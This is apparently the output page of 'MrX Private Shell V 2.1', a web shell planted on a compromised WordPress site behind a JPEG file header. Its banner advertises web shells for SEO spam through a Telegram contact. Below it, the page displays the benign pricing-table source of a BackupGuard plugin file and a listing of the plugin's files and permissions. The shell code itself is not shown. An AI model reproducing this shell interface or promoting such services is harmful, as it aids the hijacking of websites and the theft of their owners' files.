����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
$contentClassName = getBackupPageContentClassName('pro_features');
$optionsAvailability = array();
$optionsAvailability['Website Backup & Restore'] = array('free' => 1, 'silver' => 1, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['Website Migration'] = array('free' => 0, 'silver' => 1, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['Backup to Dropbox (64-bit OS)'] = array('free' => 1, 'silver' => 1, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['Backup Download & Import'] = array('free' => 1, 'silver' => 1, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['Automatic Backups (single profile)'] = array('free' => 0, 'silver' => 1, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['E-mail Notifications'] = array('free' => 0, 'silver' => 1, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['Backup to SFTP/FTP'] = array('free' => 0, 'silver' => 1, 'gold' => 1, 'platinum' => 1);
/// start Gold
$optionsAvailability['Backup to Google Drive'] = array('free' => 0, 'silver' => 0, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['Backup to Amazon S3'] = array('free' => 0, 'silver' => 0, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['Backup to OneDrive'] = array('free' => 0, 'silver' => 0, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['Backup Retention'] = array('free' => 0, 'silver' => 0, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['Restore from all Supported Clouds'] = array('free' => 0, 'silver' => 0, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['Delete Local Copy after Upload'] = array('free' => 0, 'silver' => 0, 'gold' => 1, 'platinum' => 1);
$optionsAvailability['Customize Backup Name'] = array('free' => 0, 'silver' => 0, 'gold' => 1, 'platinum' => 1);
// start Platinum
$optionsAvailability['Multiple Automatic Backups'] = array('free' => 0, 'silver' => 0, 'gold' => 0, 'platinum' => 1);
$optionsAvailability['Multiple Automatic Backups'] = array('free' => 0, 'silver' => 0, 'gold' => 0, 'platinum' => 1);
?>
<div id="sg-backup-page-content-pro_features" class="sg-backup-page-content <?php echo $contentClassName; ?>">
<div><h1 class="sg-backup-page-title"><?php _backupGuardT('Why upgrade?')?></h1></div>
<div class="sg-wrap-container sg-pricing-table-wrapper">
<h3 class="sg-backup-guard-plans-title"><?php _backupGuardT('BackupGuard Plans')?></h3>
<div class="sg-backup-header-row sg-backup-table-row">
<div class="col-md-4 sg-pricing-table-header-first-column">
<span class="sg-pricing-table-header-label"></span>
</div>
<div class="col-md-2">
<span class="sg-pricing-table-header-label"><?php _backupGuardT('Free'); ?></span>
<span class="sg-pricing-table-blue-label"><b><?php _backupGuardT('0'); ?></b> <span class="sg-backup-pricing-currency">US$</span></span>
</div>
<div class="col-md-2">
<span class="sg-pricing-table-header-label"><?php _backupGuardT('Silver'); ?></span>
<span class="sg-pricing-table-blue-label"><b><?php _backupGuardT('25'); ?></b> <span class="sg-backup-pricing-currency">US$</span></span>
</div>
<div class="col-md-2">
<span class="sg-pricing-table-header-label"><?php _backupGuardT('Gold'); ?></span>
<span class="sg-pricing-table-blue-label"><b><?php _backupGuardT('39'); ?></b> <span class="sg-backup-pricing-currency">US$</span></span>
</div>
<div class="col-md-2">
<span class="sg-pricing-table-header-label"><?php _backupGuardT('Platinum'); ?></span>
<span class="sg-pricing-table-blue-label"><b><?php _backupGuardT('99'); ?></b> <span class="sg-backup-pricing-currency">US$</span></span>
</div>
</div>
<div class="sg-backup-table-row">
<div class="col-md-4">
<span class="sg-pricng-table-option"><?php _backupGuardT('Licences:')?></span>
</div>
<div class="col-md-2" style="text-align: center">
<span class="sg-backup-plan-excluded"></span>
</div>
<div class="col-md-2">
<span class="sg-pricing-table-includes"><?php _backupGuardT('Up to 2 Websites')?></span>
</div>
<div class="col-md-2">
<span class="sg-pricing-table-includes"><?php _backupGuardT('Up to 5 Websites')?></span>
</div>
<div class="col-md-2">
<span class="sg-pricing-table-includes"><?php _backupGuardT('Unlimited Websites')?></span>
</div>
</div>
<div class="sg-backup-table-options-wrapper">
<?php foreach ($optionsAvailability as $label => $availability): ?>
<div class="sg-backup-table-row">
<div class="col-md-4 sg-pricing-table-option-wrapper">
<span class="sg-pricing-table-option"><?php _backupGuardT($label); ?></span>
</div>
<div class="col-md-2">
<?php if ($availability['free'] == 1): ?>
<span class="sg-backup-plan-included"></span>
<?php else: ?>
<span class="sg-backup-plan-excluded"></span>
<?php endif;?>
</div>
<div class="col-md-2">
<?php if ($availability['silver'] == 1): ?>
<span class="sg-backup-plan-included"></span>
<?php else: ?>
<span class="sg-backup-plan-excluded"></span>
<?php endif;?>
</div>
<div class="col-md-2">
<?php if ($availability['gold'] == 1): ?>
<span class="sg-backup-plan-included"></span>
<?php else: ?>
<span class="sg-backup-plan-excluded"></span>
<?php endif;?>
</div>
<div class="col-md-2">
<?php if ($availability['platinum'] == 1): ?>
<span class="sg-backup-plan-included"></span>
<?php else: ?>
<span class="sg-backup-plan-excluded"></span>
<?php endif;?>
</div>
</div>
<?php endforeach;?>
</div>
</div>
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ajax | Folder | 0755 |
|
|
| config | Folder | 0755 |
|
|
| cron | Folder | 0755 |
|
|
| css | Folder | 0755 |
|
|
| fonts | Folder | 0755 |
|
|
| img | Folder | 0755 |
|
|
| include | Folder | 0755 |
|
|
| js | Folder | 0755 |
|
|
| templates | Folder | 0755 |
|
|
| backups.php | File | 13.46 KB | 0644 |
|
| boot.php | File | 180 B | 0644 |
|
| cloud.php | File | 14.66 KB | 0644 |
|
| dashboardWidget.php | File | 3.16 KB | 0644 |
|
| pagesContent.php | File | 1.29 KB | 0644 |
|
| proFeatures.php | File | 6.25 KB | 0644 |
|
| restore_wordpress.php | File | 7.49 KB | 0644 |
|
| schedule.php | File | 14.54 KB | 0644 |
|
| security.php | File | 260 B | 0644 |
|
| services.php | File | 3.79 KB | 0644 |
|
| settings.php | File | 20.2 KB | 0644 |
|
| support.php | File | 314 B | 0644 |
|
| systemInfo.php | File | 5.9 KB | 0644 |
|
| videoTutorials.php | File | 638 B | 0644 |
|